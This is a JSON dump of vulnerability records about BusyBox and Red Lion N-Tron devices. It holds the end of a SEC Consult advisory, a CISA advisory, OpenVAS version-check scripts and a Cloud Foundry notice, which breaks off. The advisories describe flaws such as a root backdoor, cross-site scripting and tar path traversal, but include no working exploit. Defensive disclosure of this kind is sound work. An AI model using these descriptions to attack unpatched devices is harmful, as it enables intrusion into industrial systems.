852-303: v1.2.2.S0 \n* 852-1305: v1.1.6.S0 \n* 852-1505: v1.1.5.S0 \n \nAccording to the vendor, busybox and glibc have been updated and the embedded \nprivate keys are being newly generated upon first boot and after a factory reset. \nThe root login via Telnet and SSH has been disabled and the admin account is \ndocumented and can be changed by the customer. \n \n \n \nWorkaround: \n----------- \nRestrict network access to the device & SSH server. \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://www.sec-consult.com/en/career/index.html \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://www.sec-consult.com/en/contact/index.html \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF T. Weber / @2019 \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/153278/SA-20190612-0.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2022-04-26T21:52:11", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n * **ATTENTION: **Exploitable remotely/low skill level to exploit\n * **Vendor: **Red Lion\n * **Equipment:** N-Tron 702-W / 702M12-W\n * **Vulnerabilities:** Reflected Cross-site Scripting, Stored Cross-site Scripting, Cross-site Request Forgery, Hidden Functionality, Use of Unmaintained Third-Party Components\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could allow an attacker to gain unauthorized access to sensitive information, execute system commands, and perform actions in the context of an attacked user.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following Red Lion products are affected:\n\n * N-Tron 702-W: All versions\n * N-Tron 702M12-W: All versions\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION (\u2018CROSS-SITE SCRIPTING\u2019) CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\nThe affected product is vulnerable to reflected cross-site scripting, which may allow an attacker to remotely execute arbitrary code and perform actions in the context of an attacked user.\n\n[CVE-2020-16210](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16210>) has been assigned to this vulnerability. A CVSS v3 base score of 9.0 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H>)). \n\n#### 3.2.2 [IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION (\u2018CROSS-SITE SCRIPTING\u2019) CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\nThe affected product is vulnerable to stored cross-site scripting, which may allow an attacker to remotely execute arbitrary code to gain access to sensitive data.\n\n[CVE-2020-16206](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16206>) has been assigned to this vulnerability. A CVSS v3 base score of 9.0 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H>)).\n\n#### 3.2.3 [CROSS-SITE REQUEST FORGERY (CSRF) CWE-352](<https://cwe.mitre.org/data/definitions/352.html>)\n\nThe affected product is vulnerable to cross-site request forgery, which may allow an attacker to modify different configurations of a device by luring an authenticated user to click on a crafted link.\n\n[CVE-2020-16208](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16208>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.4 [HIDDEN FUNCTIONALITY (BACKDOOR) CWE-912](<https://cwe.mitre.org/data/definitions/912.html>)\n\nThe affected product is vulnerable due to an undocumented interface found on the device, which may allow an attacker to execute commands as root on the device.\n\n[CVE-2020-16204](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16204>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.5 [USE OF UNMAINTAINED THIRD-PARTY COMPONENTS CWE-1104](<https://cwe.mitre.org/data/definitions/1104.html>)\n\nThe affected product is vulnerable due to outdated software components, which may allow an attacker to gain access to sensitive information and take control of the device.\n\n[CVE-2017-16544](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16544>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Commercial Facilities, Energy, Transportation Systems, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION: **United States\n\n### 3.4 RESEARCHER\n\nThomas Weber from SEC Consult Vulnerability Lab reported these vulnerabilities to CISA.\n\n## 4\\. MITIGATIONS\n\nRed Lion\u2019s 702-W Series was discontinued in 2018 and cannot be updated. Red Lion recommends these products be used locally within a secure network.\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are [not accessible from the Internet](<https://www.us-cert.gov/ics/alerts/ICS-ALERT-10-301-01>).\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nCISA also recommends users take the following measures to protect themselves from social engineering attacks: \n\n * Do not click web links or open unsolicited attachments in email messages. \n * Refer to [Recognizing and Avoiding Email Scams](<https://www.us-cert.gov/sites/default/files/publications/emailscams_0905.pdf>) for more information on avoiding email scams. \n * Refer to [Avoiding Social Engineering and Phishing Attacks](<https://www.us-cert.gov/ncas/tips/ST04-014>) for more information on social engineering attacks.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://www.us-cert.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-27T00:00:00", "type": "ics", "title": "Red Lion N-Tron 702-W, 702M12-W", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16544", "CVE-2020-16204", "CVE-2020-16206", "CVE-2020-16208", "CVE-2020-16210", "CVE-2020-16544"], "modified": "2020-08-27T00:00:00", "id": "ICSA-20-240-01", "href": "https://www.us-cert.gov/ics/advisories/icsa-20-240-01", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:32:22", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-04-04T00:00:00", "type": "openvas", "title": "Ubuntu Update for busybox USN-3935-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-5747", "CVE-2015-9261", "CVE-2014-9645", "CVE-2016-2147", "CVE-2017-16544", "CVE-2017-15873", "CVE-2018-1000517", "CVE-2016-2148", "CVE-2011-5325", "CVE-2018-20679"], "modified": "2019-04-26T00:00:00", "id": "OPENVAS:1361412562310843963", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843963", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843963\");\n script_version(\"2019-04-26T08:24:31+0000\");\n script_cve_id(\"CVE-2011-5325\", \"CVE-2014-9645\", \"CVE-2015-9261\", \"CVE-2016-2147\",\n \"CVE-2016-2148\", \"CVE-2017-15873\", \"CVE-2017-16544\", \"CVE-2018-1000517\",\n \"CVE-2018-20679\", \"CVE-2019-5747\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-04-26 08:24:31 +0000 (Fri, 26 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-04 02:03:26 +0000 (Thu, 04 Apr 2019)\");\n script_name(\"Ubuntu Update for busybox USN-3935-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU14\\.04 LTS|UBUNTU18\\.04 LTS|UBUNTU18\\.10|UBUNTU16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"3935-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3935-1/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'busybox'\n package(s) announced via the USN-3935-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Tyler Hicks discovered that BusyBox incorrectly handled symlinks inside tar\narchives. If a user or automated system were tricked into processing a\nspecially crafted tar archive, a remote attacker could overwrite arbitrary\nfiles outside of the current directory. This issue only affected Ubuntu\n14.04 LTS and Ubuntu 16.04 LTS. (CVE-2011-5325)\n\nMathias Krause discovered that BusyBox incorrectly handled kernel module\nloading restrictions. A local attacker could possibly use this issue to\nbypass intended restrictions. This issue only affected Ubuntu 14.04 LTS.\n(CVE-2014-9645)\n\nIt was discovered that BusyBox incorrectly handled certain ZIP archives. If\na user or automated system were tricked into processing a specially crafted\nZIP archive, a remote attacker could cause BusyBox to crash, leading to a\ndenial of service. This issue only affected Ubuntu 14.04 LTS and Ubuntu\n16.04 LTS. (CVE-2015-9261)\n\nNico Golde discovered that the BusyBox DHCP client incorrectly handled\ncertain malformed domain names. A remote attacker could possibly use this\nissue to cause the DHCP client to crash, leading to a denial of service.\nThis issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS.\n(CVE-2016-2147)\n\nNico Golde discovered that the BusyBox DHCP client incorrectly handled\ncertain 6RD options. A remote attacker could use this issue to cause the\nDHCP client to crash, leading to a denial of service, or possibly execute\narbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04\nLTS. (CVE-2016-2148)\n\nIt was discovered that BusyBox incorrectly handled certain bzip2 archives.\nIf a user or automated system were tricked into processing a specially\ncrafted bzip2 archive, a remote attacker could cause BusyBox to crash,\nleading to a denial of service, or possibly execute arbitrary code. This\nissue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2017-15873)\n\nIt was discovered that BusyBox incorrectly handled tab completion. A local\nattacker could possibly use this issue to execute arbitrary code. This\nissue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2017-16544)\n\nIt was discovered that the BusyBox wget utility incorrectly handled certain\nresponses. A remote attacker could use this issue to cause BusyBox to\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode. (CVE-2018-1000517)\n\nIt was discovered that the BusyBox DHCP utilities incorrectly handled\ncertain memory operations. A remote attacker could possibly use this issue\nto access sensitive information. (CVE-2018-20679, CVE-2019-5747)\");\n\n script_tag(name:\"affected\", value:\"'busybox' package(s) on Ubuntu 18.10, Ubuntu 18.04 LTS, Ubuntu 16.04 LTS, Ubuntu 14.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU14.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"busybox\", ver:\"1:1.21.0-1ubuntu1.4\", rls:\"UBUNTU14.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"busybox-initramfs\", ver:\"1:1.21.0-1ubuntu1.4\", rls:\"UBUNTU14.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"busybox-static\", ver:\"1:1.21.0-1ubuntu1.4\", rls:\"UBUNTU14.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"udhcpc\", ver:\"1:1.21.0-1ubuntu1.4\", rls:\"UBUNTU14.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"udhcpd\", ver:\"1:1.21.0-1ubuntu1.4\", rls:\"UBUNTU14.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"busybox\", ver:\"1:1.27.2-2ubuntu3.2\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"busybox-initramfs\", ver:\"1:1.27.2-2ubuntu3.2\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"busybox-static\", ver:\"1:1.27.2-2ubuntu3.2\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"udhcpc\", ver:\"1:1.27.2-2ubuntu3.2\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"udhcpd\", ver:\"1:1.27.2-2ubuntu3.2\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU18.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"busybox\", ver:\"1:1.27.2-2ubuntu4.1\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"busybox-initramfs\", ver:\"1:1.27.2-2ubuntu4.1\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"busybox-static\", ver:\"1:1.27.2-2ubuntu4.1\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"udhcpc\", ver:\"1:1.27.2-2ubuntu4.1\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"udhcpd\", ver:\"1:1.27.2-2ubuntu4.1\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"busybox\", ver:\"1:1.22.0-15ubuntu1.4\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"busybox-initramfs\", ver:\"1:1.22.0-15ubuntu1.4\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"busybox-static\", ver:\"1:1.22.0-15ubuntu1.4\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"udhcpc\", ver:\"1:1.22.0-15ubuntu1.4\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"udhcpd\", ver:\"1:1.22.0-15ubuntu1.4\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:07:14", "description": "Busybox, utility programs for small and embedded systems, was affected\nby several security vulnerabilities. The Common Vulnerabilities and\nExposures project identifies the following issues.\n\nCVE-2011-5325\n\nA path traversal vulnerability was found in Busybox implementation\nof tar. tar will extract a symlink that points outside of the\ncurrent working directory and then follow that symlink when\nextracting other files. This allows for a directory traversal\nattack when extracting untrusted tarballs.\n\nCVE-2013-1813\n\nWhen device node or symlink in /dev should be created inside\n2-or-deeper subdirectory (/dev/dir1/dir2.../node), the intermediate\ndirectories are created with incorrect permissions.\n\nCVE-2014-4607\n\nAn integer overflow may occur when processing any variant of a\n", "cvss3": {}, "published": "2018-07-27T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for busybox (DLA-1445-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1813", "CVE-2015-9261", "CVE-2014-9645", "CVE-2016-2147", "CVE-2014-4607", "CVE-2017-16544", "CVE-2017-15873", "CVE-2018-1000517", "CVE-2016-2148", "CVE-2011-5325", "CVE-2015-9621"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891445", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891445", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891445\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2011-5325\", \"CVE-2013-1813\", \"CVE-2014-4607\", \"CVE-2014-9645\", \"CVE-2015-9261\",\n \"CVE-2015-9621\", \"CVE-2016-2147\", \"CVE-2016-2148\", \"CVE-2017-15873\", \"CVE-2017-16544\",\n \"CVE-2018-1000517\");\n script_name(\"Debian LTS: Security Advisory for busybox (DLA-1445-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-07-27 00:00:00 +0200 (Fri, 27 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/07/msg00037.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"busybox on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n1:1.22.0-9+deb8u2.\n\nWe recommend that you upgrade your busybox packages.\");\n\n script_tag(name:\"summary\", value:\"Busybox, utility programs for small and embedded systems, was affected\nby several security vulnerabilities. The Common Vulnerabilities and\nExposures project identifies the following issues.\n\nCVE-2011-5325\n\nA path traversal vulnerability was found in Busybox implementation\nof tar. tar will extract a symlink that points outside of the\ncurrent working directory and then follow that symlink when\nextracting other files. This allows for a directory traversal\nattack when extracting untrusted tarballs.\n\nCVE-2013-1813\n\nWhen device node or symlink in /dev should be created inside\n2-or-deeper subdirectory (/dev/dir1/dir2.../node), the intermediate\ndirectories are created with incorrect permissions.\n\nCVE-2014-4607\n\nAn integer overflow may occur when processing any variant of a\n'literal run' in the lzo1x_decompress_safe function. Each of these\nthree locations is subject to an integer overflow when processing\nzero bytes. This exposes the code that copies literals to memory\ncorruption.\n\nCVE-2014-9645\n\nThe add_probe function in modutils/modprobe.c in BusyBox allows\nlocal users to bypass intended restrictions on loading kernel\nmodules via a / (slash) character in a module name, as demonstrated\nby an 'ifconfig /usbserial up' command or a 'mount -t /snd_pcm none\n/' command.\n\nCVE-2016-2147\n\nInteger overflow in the DHCP client (udhcpc) in BusyBox allows\nremote attackers to cause a denial of service (crash) via a\nmalformed RFC1035-encoded domain name, which triggers an\nout-of-bounds heap write.\n\nCVE-2016-2148\n\nHeap-based buffer overflow in the DHCP client (udhcpc) in BusyBox\nallows remote attackers to have unspecified impact via vectors\ninvolving OPTION_6RD parsing.\n\nCVE-2017-15873\n\nThe get_next_block function in archival/libarchive\n/decompress_bunzip2.c in BusyBox has an Integer Overflow that may\nlead to a write access violation.\n\nCVE-2017-16544\n\nIn the add_match function in libbb/lineedit.c in BusyBox, the tab\nautocomplete feature of the shell, used to get a list of filenames\nin a directory, does not sanitize filenames and results in executing\nany escape sequence in the terminal. This could potentially result\nin code execution, arbitrary file writes, or other attacks.\n\nCVE-2018-1000517\n\nBusyBox contains a Buffer Overflow vulnerability in\nBusybox wget that can result in a heap-based buffer overflow.\nThis attack appears to be exploitable via network connectivity.\n\nCVE-2015-9621\n\nUnziping a specially crafted zip file results in a computation of an\ninvalid pointer and a crash reading an invalid address.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"busybox\", ver:\"1:1.22.0-9+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"busybox-static\", ver:\"1:1.22.0-9+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"busybox-syslogd\", ver:\"1:1.22.0-9+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"udhcpc\", ver:\"1:1.22.0-9+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"udhcpd\", ver:\"1:1.22.0-9+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:40", "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n * Canonical Ubuntu 16.04\n * Canonical Ubuntu 18.04\n\n# Description\n\nTyler Hicks discovered that BusyBox incorrectly handled symlinks inside tar archives. If a user or automated system were tricked into processing a specially crafted tar archive, a remote attacker could overwrite arbitrary files outside of the current directory. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2011-5325)\n\nMathias Krause discovered that BusyBox incorrectly handled kernel module loading restrictions. A local attacker could possibly use this issue to bypass intended restrictions. This issue only affected Ubuntu 14.04 LTS. (CVE-2014-9645)\n\nIt was discovered that BusyBox incorrectly handled certain ZIP archives. If a user or automated system were tricked into processing a specially crafted ZIP archive, a remote attacker could cause BusyBox to crash, leading to a denial of service. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2015-9261)\n\nNico Golde discovered that the BusyBox DHCP client incorrectly handled certain malformed domain names. A remote attacker could possibly use this issue to cause the DHCP client to crash, leading to a denial of service. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2016-2147)\n\nNico Golde discovered that the BusyBox DHCP client incorrectly handled certain 6RD options. A remote attacker could use this issue to cause the DHCP client to crash, leading to a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2016-2148)\n\nIt was discovered that BusyBox incorrectly handled certain bzip2 archives. If a user or automated system were tricked into processing a specially crafted bzip2 archive, a remote attacker could cause BusyBox to crash, leading to a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2017-15873)\n\nIt was discovered that BusyBox incorrectly handled tab completion. A local attacker could possibly use this issue to execute arbitrary code. 